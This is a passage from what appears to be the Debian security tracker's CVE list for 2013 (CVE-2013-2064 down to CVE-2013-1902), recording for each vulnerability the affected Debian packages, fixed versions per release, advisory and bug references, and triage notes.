ruby1.9.1 1.9.3.448-1 (low) [wheezy] - ruby1.9.1 1.9.3.194-8.1+deb7u1 - ruby1.8 (Only affects 1.9 and 2.x) NOTE: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=40732 CVE-2013-2064 (Integer overflow in X.org libxcb 1.9 and earlier allows X servers to t ...) {DSA-2686-1} - libxcb 1.8.1-2+deb7u1 CVE-2013-2063 (Integer overflow in X.org libXtst 1.2.1 and earlier allows X servers t ...) {DSA-2689-1} - libxtst 2:1.2.1-1+deb7u1 CVE-2013-2062 (Multiple integer overflows in X.org libXp 1.0.1 and earlier allow X se ...) {DSA-2685-1} - libxp 1:1.0.1-2+deb7u1 CVE-2013-2061 (The openvpn_decrypt function in crypto.c in OpenVPN 2.3.0 and earlier, ...) - openvpn 2.3.1-1 (low; bug #707329) [squeeze] - openvpn 2.1.3-2+squeeze2 [wheezy] - openvpn 2.2.1-8+deb7u1 NOTE: https://community.openvpn.net/openvpn/wiki/SecurityAnnouncement-f375aa67cc CVE-2013-2060 (The download_from_url function in OpenShift Origin allows remote attac ...) NOT-FOR-US: OpenShift CVE-2013-2059 (OpenStack Identity (Keystone) Folsom 2012.2.4 and earlier, Grizzly bef ...) - keystone 2013.1.1-2 (bug #707598) [wheezy] - keystone 2012.1.1-13+wheezy1 NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000099.html CVE-2013-2058 (The host_start function in drivers/usb/chipidea/host.c in the Linux ke ...) - linux-2.6 (Vulnerable code not present) - linux 3.8-1 [wheezy] - linux (Vulnerable code not present) NOTE: https://www.openwall.com/lists/oss-security/2013/05/03/2 CVE-2013-2057 (YaBB through 2.5.2: 'guestlanguage' Cookie Parameter Local File Includ ...) NOT-FOR-US: YaBB CVE-2013-2056 (The Inter-Satellite Sync (ISS) operation in Red Hat Network (RHN) Sate ...) NOT-FOR-US: RHN Satellite CVE-2013-2055 (Unspecified vulnerability in Apache Wicket 1.4.x before 1.4.23, 1.5.x ...) NOT-FOR-US: Apache Wicket CVE-2013-2054 (Buffer overflow in the atodn function in strongSwan 2.0.0 through 4.3. ...) - strongswan 4.3.4-1 NOTE: http://download.strongswan.org/patches/11_pluto_atodn_patch/CVE-2013-2054.txt CVE-2013-2053 (Buffer overflow in the atodn function in Openswan before 2.6.39, when ...) {DSA-2893-1} - openswan (low; bug #709144) CVE-2013-2052 (Buffer overflow in the atodn function in libreswan 3.0 and 3.1, when O ...) - libreswan (Fixed before the initial upload to Debian) NOTE: https://libreswan.org/security/CVE-2013-2052/CVE-2013-2052.txt CVE-2013-2051 (The Tomcat 6 DIGEST authentication functionality as used in Red Hat En ...) - tomcat6 (RedHat-specific issue) - tomcat7 (RedHat-specific issue) CVE-2013-2050 (SQL injection vulnerability in the miq_policy controller in Red Hat Cl ...) NOT-FOR-US: CloudForms Management Engine CVE-2013-2049 (Red Hat CloudForms 2 Management Engine (CFME) allows remote attackers ...) NOT-FOR-US: CloudForms Management Engine CVE-2013-2048 (ownCloud before 5.0.6 does not properly check permissions, which allow ...) - owncloud (Only affects 5.0.x) CVE-2013-2047 (The login page (aka index.php) in ownCloud before 5.0.6 does not disab ...) - owncloud (Only 5.0.x) CVE-2013-2046 (SQL injection vulnerability in lib/bookmarks.php in ownCloud Server 4. ...) - owncloud (Only affects 4.5.x) CVE-2013-2045 (SQL injection vulnerability in lib/db.php in ownCloud Server 5.0.x bef ...) - owncloud (Only affects 5.0.x) CVE-2013-2044 (Open redirect vulnerability in the Login Page (index.php) in ownCloud ...) - owncloud (Only 5.0.x) CVE-2013-2043 (apps/calendar/ajax/events.php in ownCloud before 4.5.11 and 5.x before ...) - owncloud (Only 5.0.x and 4.5.x) CVE-2013-2042 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.15debian-1 CVE-2013-2041 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 5.0.x ...) - owncloud (Only affects 5.0.x) CVE-2013-2040 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.15debian-1 CVE-2013-2039 (Directory traversal vulnerability in lib/files/view.php in ownCloud be ...) - owncloud 4.0.15debian-1 CVE-2013-2038 (The NMEA0183 driver in gpsd before 3.9 allows remote attackers to caus ...) - gpsd 3.6-5 (bug #706665) [wheezy] - gpsd 3.6-4+deb7u1 [squeeze] - gpsd (Minor issue) NOTE: http://lists.nongnu.org/archive/html/gpsd-dev/2013-05/msg00000.html CVE-2013-2037 (httplib2 0.7.2, 0.8, and earlier, after an initial connection is made, ...) - python-httplib2 0.8-2 (low; bug #706602) [squeeze] - python-httplib2 (Minor issue) [wheezy] - python-httplib2 0.7.4-2+deb7u1 NOTE: http://openwall.com/lists/oss-security/2013/05/01/5 CVE-2013-2036 (Cross-site scripting (XSS) vulnerability in the Filebrowser module 6.x ...) NOT-FOR-US: Drupal module Filebrowser CVE-2013-2035 (Race condition in hawtjni-runtime/src/main/java/org/fusesource/hawtjni ...) - hawtjni 1.10-1 (low; bug #708293) [wheezy] - hawtjni 1.0~+git0c502e20c4-3+deb7u1 CVE-2013-2034 (Multiple cross-site request forgery (CSRF) vulnerabilities in Jenkins ...) - jenkins 1.509.2+dfsg-1 (bug #706725) CVE-2013-2033 (Cross-site scripting (XSS) vulnerability in Jenkins before 1.514, LTS ...) - jenkins 1.509.2+dfsg-1 (bug #706725) CVE-2013-2032 (MediaWiki before 1.19.6 and 1.20.x before 1.20.5 does not allow extens ...) {DSA-2891-1} - mediawiki 1:1.19.6-1 (low; bug #706601) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46590 CVE-2013-2031 (MediaWiki before 1.19.6 and 1.20.x before 1.20.5 allows remote attacke ...) {DSA-2891-1} - mediawiki 1:1.19.6-1 (bug #706601) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=47304 CVE-2013-2030 (keystone/middleware/auth_token.py in OpenStack Nova Folsom, Grizzly, a ...) - nova (Option not present in nova/2012.1.1) NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000098.html CVE-2013-2029 (nagios.upgrade_to_v3.sh, as distributed by Red Hat and possibly others ...) - nagios3 (Affected file nagios.upgrade_to_v3.sh not in Debian) NOTE: https://www.openwall.com/lists/oss-security/2013/04/30/8 CVE-2013-2028 (The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx ...) - nginx (Vulnerable code not present) CVE-2013-2027 (Jython 2.2.1 uses the current umask to set the privileges of the class ...) [experimental] - jython 2.7.0+repack-1 - jython 2.7.1+repack-1 (low; bug #777079) [stretch] - jython (Minor issue) [jessie] - jython (Minor issue) [wheezy] - jython (Minor issue) [squeeze] - jython (Minor issue) NOTE: http://bugs.jython.org/issue2044 NOTE: The original issue seem addressed in 2.7.0+repack-1, but still files NOTE: might be created/written to /usr/share/jython/cachedir/packages NOTE: which should not be in /usr beeing a cachedir. CVE-2013-2026 REJECTED CVE-2013-2025 (Cross-site scripting (XSS) vulnerability in Ushahidi Platform 2.5.x th ...) NOT-FOR-US: Ushahidi CVE-2013-2024 (OS command injection vulnerability in the "qs" procedure from the "uti ...) - chicken 4.8.0.3-1 (bug #706525) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) NOTE: http://lists.nongnu.org/archive/html/chicken-announce/2013-04/msg00000.html CVE-2013-2023 (Cross-site scripting (XSS) vulnerability in actionscript/Jplayer.as in ...) - jquery-jplayer 2.1.0-2 NOTE: used for jPlayer 2.2.23 XSS NOTE: https://www.openwall.com/lists/oss-security/2013/05/05/3 CVE-2013-2022 (Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jp ...) - jquery-jplayer 2.1.0-2 NOTE: https://github.com/happyworm/jPlayer/commit/c5fe17bb4459164bd59153b57248cf94b8867373 NOTE: used for jPlayer 2.2.20 XSS NOTE: https://www.openwall.com/lists/oss-security/2013/05/05/3 CVE-2013-2021 (pdf.c in ClamAV 0.97.1 through 0.97.7 allows remote attackers to cause ...) - clamav 0.97.8+dfsg-1 [squeeze] - clamav 0.97.8+dfsg-1~squeeze1 CVE-2013-2020 (Integer underflow in the cli_scanpe function in pe.c in ClamAV before ...) - clamav 0.97.8+dfsg-1 [squeeze] - clamav 0.97.8+dfsg-1~squeeze1 CVE-2013-2019 (Stack-based buffer overflow in BOINC 6.10.58 and 6.12.34 allows remote ...) - boinc 6.13.6+dfsg-1 (low) [squeeze] - boinc (Minor issue) NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=9a4140ae30a72e5175f3f31646d91f2d58df7156 CVE-2013-2018 (Multiple SQL injection vulnerabilities in BOINC allow remote attackers ...) - boinc 7.0.65+dfsg-1 (low) [squeeze] - boinc (Vulnerable code not present) [wheezy] - boinc (Minor issue) NOTE: server-maker not shipped in squeeze CVE-2013-2017 (The veth (aka virtual Ethernet) driver in the Linux kernel before 2.6. ...) - linux 2.6.34-1 - linux-2.6 2.6.34-1 [squeeze] - linux-2.6 (Introduced in 2.6.33) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6ec82562ffc6f297d0de36d65776cff8e5704867 NOTE: http://marc.info/?l=linux-netdev&m=127310770900442&w=3 CVE-2013-2016 (A flaw was found in the way qemu v1.3.0 and later (virtio-rng) validat ...) - qemu 1.5.0+dfsg-1 (bug #710822) [jessie] - qemu (vulnerability introduced in 1.3.0) [wheezy] - qemu (vulnerability introduced in 1.3.0) [squeeze] - qemu (vulnerability introduced in 1.3.0) - qemu-kvm (vulnerability introduced in 1.3.0) NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05013.html NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05254.html NOTE: http://marc.info/?l=oss-security&m=136722323931507&w=2 NOTE: Only pratically affects virtio-rng according to oss-reference (and if mmap_min_addr = 0) CVE-2013-2015 (The ext4_orphan_del function in fs/ext4/namei.c in the Linux kernel be ...) {DSA-2669-1 DSA-2668-1} - linux 3.8-1 (low) - linux-2.6 (low) CVE-2013-2014 (OpenStack Identity (Keystone) before 2013.1 allows remote attackers to ...) - keystone 2013.1.1-2 (bug #708515) [wheezy] - keystone (Minor issue) CVE-2013-2013 (The user-password-update command in python-keystoneclient before 0.2.4 ...) - python-keystoneclient 1:0.2.5-1 (bug #709535) [wheezy] - python-keystoneclient 2012.1-3+deb7u1 NOTE: https://bugs.launchpad.net/python-keystoneclient/+bug/938315 NOTE: https://review.openstack.org/28702 CVE-2013-2012 (autojump before 21.5.8 allows local users to gain privileges via a Tro ...) - autojump (vulnerable code not present for unstable) NOTE: experimental affected as per 21.5.1-1, see #706252 NOTE: experimental fixed as 21.5.1-2 CVE-2013-2011 (WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execu ...) NOT-FOR-US: WP Super Cache NOTE: this issue exists because of an incomplete fix for CVE-2013-2009 CVE-2013-2010 (WordPress W3 Total Cache Plugin 0.9.2.8 has a Remote PHP Code Executio ...) NOT-FOR-US: W3 Total Cache CVE-2013-2009 (WordPress WP Super Cache Plugin 1.2 has Remote PHP Code Execution ...) NOT-FOR-US: WP Super Cache CVE-2013-2008 (WordPress Super Cache Plugin 1.3 has XSS. ...) NOT-FOR-US: WP Super Cache CVE-2013-2007 (The qemu guest agent in Qemu 1.4.1 and earlier, as used by Xen, when s ...) - qemu (qemu guest agent introduced in 1.4, vulnerable versions were only in experimental) - qemu-kvm (qemu guest agent introduced in 1.4) CVE-2013-2006 (OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode loggin ...) - keystone 2013.1.1-2 [wheezy] - keystone (Minor issue) NOTE: https://review.openstack.org/#/c/26826/2/keystone/common/config.py NOTE: https://bugs.launchpad.net/keystone/+bug/1172195 CVE-2013-2005 (X.org libXt 1.1.3 and earlier does not check the return value of the X ...) {DSA-2680-1} - libxt 1:1.1.3-1+deb7u1 CVE-2013-2004 (The (1) GetDatabase and (2) _XimParseStringFile functions in X.org lib ...) {DSA-2693-1} - libx11 2:1.5.0-1+deb7u1 CVE-2013-2003 (Integer overflow in X.org libXcursor 1.1.13 and earlier allows X serve ...) {DSA-2681-1} - libxcursor 1:1.1.13-1+deb7u1 CVE-2013-2002 (Buffer overflow in X.org libXt 1.1.3 and earlier allows X servers to c ...) {DSA-2680-1} - libxt 1:1.1.3-1+deb7u1 CVE-2013-2001 (Buffer overflow in X.org libXxf86vm 1.1.2 and earlier allows X servers ...) {DSA-2692-1} - libxxf86vm 1:1.1.2-1+deb7u1 CVE-2013-2000 (Multiple buffer overflows in X.org libXxf86dga 1.1.3 and earlier allow ...) {DSA-2690-1} - libxxf86dga 2:1.1.3-2+deb7u1 CVE-2013-1999 (Buffer overflow in X.org libXvMC 1.0.7 and earlier allows X servers to ...) {DSA-2675-1} - libxvmc 2:1.0.8-1 CVE-2013-1998 (Multiple buffer overflows in X.org libXi 1.7.1 and earlier allow X ser ...) {DSA-2683-1} - libxi 2:1.6.1-1+deb7u1 CVE-2013-1997 (Multiple buffer overflows in X.org libX11 1.5.99.901 (1.6 RC1) and ear ...) {DSA-2693-1} - libx11 2:1.5.0-1+deb7u1 CVE-2013-1996 (X.org libFS 1.0.4 and earlier allows X servers to trigger allocation o ...) {DSA-2687-1} - libfs 2:1.0.4-1+deb7u1 CVE-2013-1995 (X.org libXi 1.7.1 and earlier allows X servers to trigger allocation o ...) {DSA-2683-1} - libxi 2:1.6.1-1+deb7u1 CVE-2013-1994 (Multiple integer overflows in X.org libchromeXvMC and libchromeXvMCPro ...) {DSA-2679-1} - xserver-xorg-video-openchrome 1:0.2.906-2+deb7u1 CVE-2013-1993 (Multiple integer overflows in X.org libGLX in Mesa 9.1.1 and earlier a ...) {DSA-2678-1} - mesa 8.0.5-6 CVE-2013-1992 (Multiple integer overflows in X.org libdmx 1.1.2 and earlier allow X s ...) {DSA-2673-1} - libdmx 1:1.1.2-1+deb7u1 CVE-2013-1991 (Multiple integer overflows in X.org libXxf86dga 1.1.3 and earlier allo ...) {DSA-2690-1} - libxxf86dga 2:1.1.3-2+deb7u1 CVE-2013-1990 (Multiple integer overflows in X.org libXvMC 1.0.7 and earlier allow X ...) {DSA-2675-1} - libxvmc 2:1.0.8-1 CVE-2013-1989 (Multiple integer overflows in X.org libXv 1.0.7 and earlier allow X se ...) {DSA-2674-1} - libxv 2:1.0.7-1+deb7u1 CVE-2013-1988 (Multiple integer overflows in X.org libXRes 1.0.6 and earlier allow X ...) {DSA-2688-1} - libxres 2:1.0.6-1+deb7u1 CVE-2013-1987 (Multiple integer overflows in X.org libXrender 0.9.7 and earlier allow ...) {DSA-2677-1} - libxrender 1:0.9.7-1+deb7u1 CVE-2013-1986 (Multiple integer overflows in X.org libXrandr 1.4.0 and earlier allow ...) {DSA-2684-1} - libxrandr 2:1.3.2-2+deb7u1 CVE-2013-1985 (Integer overflow in X.org libXinerama 1.1.2 and earlier allows X serve ...) {DSA-2691-1} - libxinerama 2:1.1.2-1+deb7u1 CVE-2013-1984 (Multiple integer overflows in X.org libXi 1.7.1 and earlier allow X se ...) {DSA-2683-1} - libxi 2:1.6.1-1+deb7u1 CVE-2013-1983 (Integer overflow in X.org libXfixes 5.0 and earlier allows X servers t ...) {DSA-2676-1} - libxfixes 1:5.0-4+deb7u1 CVE-2013-1982 (Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X ...) {DSA-2682-1} - libxext 2:1.3.1-2+deb7u1 CVE-2013-1981 (Multiple integer overflows in X.org libX11 1.5.99.901 (1.6 RC1) and ea ...) {DSA-2693-1} - libx11 2:1.5.0-1+deb7u1 CVE-2013-1980 (Buffer overflow in the get_dsmp function in loaders/masi_load.c in lib ...) - xmp 3.4.0-3 (low; bug #706667) [wheezy] - xmp (Minor issue) [squeeze] - xmp (Minor issue) CVE-2013-1979 (The scm_set_cred function in include/net/scm.h in the Linux kernel bef ...) {DSA-2669-1} - linux 3.8.11-1 - linux-2.6 (Introduced in 2.6.36) CVE-2013-1978 (Heap-based buffer overflow in the read_xwd_cols function in file-xwd.c ...) {DSA-2813-1} - gimp 2.8.10-0.1 (bug #731305) CVE-2013-1977 (OpenStack devstack uses world-readable permissions for keystone.conf, ...) - keystone (permissions to /etc/keystone/keystone.conf restricted in postinst) NOTE: https://www.openwall.com/lists/oss-security/2013/04/19/2 CVE-2013-1976 (The (1) tomcat5, (2) tomcat6, and (3) tomcat7 init scripts, as used in ...) - tomcat6 (RedHat-specific issue) - tomcat7 (RedHat-specific issue) CVE-2013-1975 RESERVED CVE-2013-1974 RESERVED CVE-2013-1973 (The autocomplete callback in Autocomplete Widgets for Text and Number ...) NOT-FOR-US: Drupal contributed module CVE-2013-1972 (Cross-site request forgery (CSRF) vulnerability in the elFinder file m ...) NOT-FOR-US: Drupal contributed module CVE-2013-1971 (Cross-site scripting (XSS) vulnerability in the MP3 Player module for ...) NOT-FOR-US: Drupal contributed module CVE-2013-1970 REJECTED CVE-2013-1969 (Multiple use-after-free vulnerabilities in libxml2 2.9.0 and possibly ...) - libxml2 (Affecting only 2.9.x, see bug #705722) NOTE: https://git.gnome.org/browse/libxml2/commit/?id=de0cc20c29cb3f056062925395e0f68d2250a46f CVE-2013-1968 (Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote authent ...) {DSA-2703-1} - subversion 1.7.9-1+nmu2 (bug #711033) NOTE: https://subversion.apache.org/security/CVE-2013-1968-advisory.txt CVE-2013-1967 (Cross-site scripting (XSS) vulnerability in flashmediaelement.swf in M ...) - owncloud (Vulnerable code not present) NOTE: oC >= 4.5 only CVE-2013-1966 (Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arb ...) - libstruts1.2-java (Only affects Struts 2) CVE-2013-1965 (Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 b ...) - libstruts1.2-java (Only affects Struts 2) CVE-2013-1964 (Xen 4.0.x and 4.1.x incorrectly releases a grant reference when releas ...) {DSA-2666-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00006.html CVE-2013-1963 (The contacts application in ownCloud before 4.5.10 and 5.x before 5.0. ...) - owncloud (Vulnerable code not present) NOTE: oC >= 4.5 only CVE-2013-1962 (The remoteDispatchStoragePoolListAllVolumes function in the storage po ...) - libvirt (Vulnerable code not present) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=ca697e90d5bd6a6dfb94bfb6d4438bdf9a44b739 CVE-2013-1961 (Stack-based buffer overflow in the t2p_write_pdf_page function in tiff ...) {DSA-2698-1 DLA-610-1} - tiff 4.0.2-6+nmu1 (bug #706674) - tiff3 3.9.7-1 (bug #712840) CVE-2013-1960 (Heap-based buffer overflow in the t2p_process_jpeg_strip function in t ...) {DSA-2698-1} - tiff 4.0.2-6+nmu1 (bug #706675) - tiff3 (tiff command line tools not build in tiff3) CVE-2013-1959 (kernel/user_namespace.c in the Linux kernel before 3.8.9 does not have ...) - linux 3.8.11-1 [wheezy] - linux (Introduced in 3.7) - linux-2.6 (Introduced in 3.7) CVE-2013-1958 (The scm_check_creds function in net/core/scm.c in the Linux kernel bef ...) - linux 3.8.13-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1957 (The clone_mnt function in fs/namespace.c in the Linux kernel before 3. ...) - linux 3.8.13-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1956 (The create_user_ns function in kernel/user_namespace.c in the Linux ke ...) - linux 3.8.11-1 [wheezy] - linux (Not exploitable by unprivileged users) - linux-2.6 (Not exploitable by unprivileged users) CVE-2013-1955 (Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php a ...) NOT-FOR-US: Easy PHP Calendar CVE-2013-1954 (The ASF Demuxer (modules/demux/asf/asf.c) in VideoLAN VLC media player ...) {DSA-2973-1} - vlc 2.0.6-1 (bug #705136) [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: http://www.videolan.org/security/sa1302.html CVE-2013-1953 (Integer underflow in the input_bmp_reader function in input-bmp.c in A ...) - autotrace 0.31.1-16+nmu1 (low; bug #742873) [wheezy] - autotrace (Minor issue) [squeeze] - autotrace (Minor issue) - gimp 2.6.10-1 NOTE: Gimp was fixed earlier, but only Squeeze version was checked NOTE: In gimp code introduced with d9c6f88141aecf956c5d721168f795de0e3027b8 NOTE: and fixed with 57f805a159874107c6c98065f9aa648c3634b8fd NOTE: https://git.gnome.org/browse/gimp/commit/?h=d9c6f88141aecf956c5d7 NOTE: https://git.gnome.org/browse/gimp/commit/?h=57f805a159874107c6c98 CVE-2013-1952 (Xen 4.x, when using Intel VT-d for a bus mastering capable PCI device, ...) {DSA-2666-1} - xen 4.1.4-4 CVE-2013-1951 (A cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.5 ...) - mediawiki 1:1.19.5-1 [squeeze] - mediawiki CVE-2013-1950 (The svc_dg_getargs function in libtirpc 0.2.3 and earlier allows remot ...) - libtirpc (regression code not present) NOTE: Regression introduced with 82cc2e6129c872c8be09381055f2fb5641c5e6fe NOTE: Regression fixed with a9f437119d79a438cb12e510f3cadd4060102c9f NOTE: https://www.openwall.com/lists/oss-security/2013/04/22/9 CVE-2013-1949 (Social Media Widget (social-media-widget) plugin 4.0 for WordPress con ...) NOT-FOR-US: Wordpress Social Media Widget CVE-2013-1948 (converter.rb in the md2pdf gem 0.0.1 for Ruby allows context-dependent ...) NOT-FOR-US: Ruby gem md2pdf CVE-2013-1947 (kelredd-pruview gem 0.3.8 for Ruby allows context-dependent attackers ...) NOT-FOR-US: Ruby Gem kelredd-pruview CVE-2013-1946 (The RESTful Web Services (RESTWS) module 7.x-1.x before 7.x-1.3 and 7. ...) NOT-FOR-US: RESTful Web Services (RESTWS) Drupal cotributed module CVE-2013-1945 (ruby193 uses an insecure LD_LIBRARY_PATH setting. ...) NOT-FOR-US: Red Hat specific packaging flaw of Ruby in Red Hat OpenShift Enterprise CVE-2013-1944 (The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 d ...) {DSA-2660-1} - curl 7.29.0-2.1 (bug #705274) [wheezy] - curl 7.26.0-1+wheezy2 NOTE: http://curl.haxx.se/docs/adv_20130412.html CVE-2013-1943 (The KVM subsystem in the Linux kernel before 3.0 does not check whethe ...) - linux (RHEL-specific backport regression) - linux-2.6 (RHEL-specific backport regression) CVE-2013-1942 (Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jp ...) - owncloud (Depends on libjs-jquery-jplayer) - jquery-jplayer 2.1.0-2 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-014/ NOTE: https://github.com/happyworm/jPlayer/commit/e8ca190f7f972a6a421cb95f09e138720e40ed6d CVE-2013-1941 (The installation routine in ownCloud Server before 4.0.14, 4.5.x befor ...) - owncloud 5.0.4~rc1+dfsg-1 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-015/ CVE-2013-1940 (X.Org X server before 1.13.4 and 1.4.x before 1.14.1 does not properly ...) {DSA-2661-1} - xorg-server 2:1.12.4-6 CVE-2013-1939 (The HTML\Browser plugin in SabreDAV before 1.6.9, 1.7.x before 1.7.7, ...) - owncloud (Windows version only) - php-sabredav (running in Windows hosts) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-016/ CVE-2013-1938 (Zimbra 2013 has XSS in aspell.php ...) NOT-FOR-US: Zimbra CVE-2013-1937 (** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in ...) - phpmyadmin (Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable) NOTE: http://seclists.org/fulldisclosure/2013/Apr/100 NOTE: https://github.com/phpmyadmin/phpmyadmin/commit/79089c9bc02c82c15419fd9d6496b8781ae08a5a CVE-2013-1936 REJECTED CVE-2013-1935 (A certain Red Hat patch to the KVM subsystem in the kernel package bef ...) - linux (RHEL-specific backport regression) - linux-2.6 (RHEL-specific backport regression) CVE-2013-1934 (A cross-site scripting (XSS) vulnerability in the configuration report ...) {DSA-3120-1} - mantis (low; bug #717482) [squeeze] - mantis (Unsupported in squeeze-lts) CVE-2013-1933 (The extract_from_ocr function in lib/docsplit/text_extractor.rb in the ...) NOT-FOR-US: Karteek Docsplit Ruby Gem CVE-2013-1932 (A cross-site scripting (XSS) vulnerability in the configuration report ...) - mantis (affects Mantis 1.2.13 only) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1931 (A cross-site scripting (XSS) vulnerability in MantisBT 1.2.14 allows r ...) - mantis (affects Mantis 1.2.14 only) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1930 (MantisBT 1.2.12 before 1.2.15 allows authenticated users to by the wor ...) - mantis (affects only Mantis 1.2.12 and later) NOTE: https://www.openwall.com/lists/oss-security/2013/04/04/8 CVE-2013-1929 (Heap-based buffer overflow in the tg3_read_vpd function in drivers/net ...) {DSA-2669-1 DSA-2668-1} - linux 3.8.11-1 - linux-2.6 CVE-2013-1928 (The do_video_set_spu_palette function in fs/compat_ioctl.c in the Linu ...) {DSA-2668-1} - linux 3.2.35-1 - linux-2.6 CVE-2013-1927 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows remo ...) - icedtea-web 1.3.2-1 CVE-2013-1926 (The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the sa ...) - icedtea-web 1.3.2-1 CVE-2013-1925 (The Chaos Tool Suite (ctools) module 7.x-1.x before 7.x-1.3 for Drupal ...) NOT-FOR-US: CTools module for Drupal CVE-2013-1924 (Commerce Skrill (Formerly Moneybookers) has an Access bypass vulnerabi ...) NOT-FOR-US: Commerce Skrill Drupal module CVE-2013-1923 (rpc-gssd in nfs-utils before 1.2.8 performs reverse DNS resolution for ...) - nfs-utils 1:1.2.8-1 (low; bug #707401) [squeeze] - nfs-utils (Minor issue) [wheezy] - nfs-utils 1:1.2.6-4 CVE-2013-1922 (qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw ...) - xen (qemu-nbd-xen built, but not installed into the binary packages) - qemu 1.5.0+dfsg-1 (low; bug #705544) [squeeze] - qemu (Minor issue) [wheezy] - qemu (Minor issue) - xen-qemu-dm-4.0 (qemu-nbd not installed by the binary package) CVE-2013-1921 (PicketBox, as used in Red Hat JBoss Enterprise Application Platform be ...) NOT-FOR-US: Red Hat JBoss Enterprise Application Platform (Debian's jboss only provides some classes) CVE-2013-1920 (Xen 4.2.x, 4.1.x, and earlier, when the hypervisor is running "under m ...) - xen (XSM not enabled in build) NOTE: Debian package not build with XSM_ENABLE, thus resulted binary packages not affected CVE-2013-1919 (Xen 4.2.x and 4.1.x does not properly restrict access to IRQs, which a ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00003.html CVE-2013-1918 (Certain page table manipulation operations in Xen 4.1.x, 4.2.x, and ea ...) {DSA-2666-1} - xen 4.1.4-4 CVE-2013-1917 (Xen 3.1 through 4.x, when running 64-bit hosts on Intel CPUs, does not ...) {DSA-2662-1} - xen 4.1.4-3 NOTE: http://lists.xen.org/archives/html/xen-announce/2013-04/msg00005.html CVE-2013-1916 RESERVED NOT-FOR-US: WordPress plugin CVE-2013-1915 (ModSecurity before 2.7.3 allows remote attackers to read arbitrary fil ...) {DSA-2659-1} - modsecurity-apache 2.6.6-6 (bug #704625) - libapache-mod-security NOTE: https://github.com/SpiderLabs/ModSecurity/commit/d4d80b38aa85eccb26e3c61b04d16e8ca5de76fe NOTE: http://marc.info/?l=oss-security&m=136499182131283&w=2 CVE-2013-1914 (Stack-based buffer overflow in the getaddrinfo function in sysdeps/pos ...) {DLA-165-1} - eglibc - glibc 2.17-2 (low; bug #704623) [wheezy] - eglibc 2.13-38+deb7u1 CVE-2013-1913 (Integer overflow in the load_image function in file-xwd.c in the X Win ...) {DSA-2813-1} - gimp 2.8.10-0.1 (bug #731305) CVE-2013-1912 (Buffer overflow in HAProxy 1.4 through 1.4.22 and 1.5-dev through 1.5- ...) {DSA-2711-1} - haproxy 1.4.23-1 (bug #704611) NOTE: http://git.1wt.eu/web?p=haproxy-1.4.git;a=commitdiff;h=dc80672211 CVE-2013-1911 (lib/ldoce/word.rb in the ldoce 0.0.2 gem for Ruby allows remote attack ...) NOT-FOR-US: ldoce ruby gem CVE-2013-1910 (yum does not properly handle bad metadata, which allows an attacker to ...) - yum (unimportant) NOTE: http://yum.baseurl.org/gitweb?p=yum.git;a=commitdiff;h=c148eb10b798270b3d15087433c8efb2a79a69d0 NOTE: Only used for bootstraps of chroots, see README.Debian CVE-2013-1909 (The Python client in Apache Qpid before 2.2 does not verify that the s ...) - qpid-python 0.22-1 (low; bug #714133) [wheezy] - qpid-python (Minor issue) CVE-2013-1908 (The Commons Wikis module before 7.x-3.1 for Drupal, as used in the Com ...) NOT-FOR-US: Drupal module CVE-2013-1907 (The Commons Group module before 7.x-3.1 for Drupal, as used in the Com ...) NOT-FOR-US: Drupal module CVE-2013-1906 (Cross-site scripting (XSS) vulnerability in the Rules module 7.x-2.x b ...) NOT-FOR-US: Drupal module Rules CVE-2013-1905 (Cross-site scripting (XSS) vulnerability in the Zero Point theme 7.x-1 ...) NOT-FOR-US: Drupal theme Zero Point CVE-2013-1904 (Absolute path traversal vulnerability in steps/mail/sendmail.inc in Ro ...) - roundcube 0.7.2-9 [squeeze] - roundcube (Vulnerable code not present) CVE-2013-1903 (PostgreSQL, possibly 9.2.x before 9.2.4, 9.1.x before 9.1.9, 9.0.x bef ...) - postgresql-9.1 (installer related) - postgresql-8.4 (installer related) CVE-2013-1902 (PostgreSQL, 9.2.x before 9.2.4, 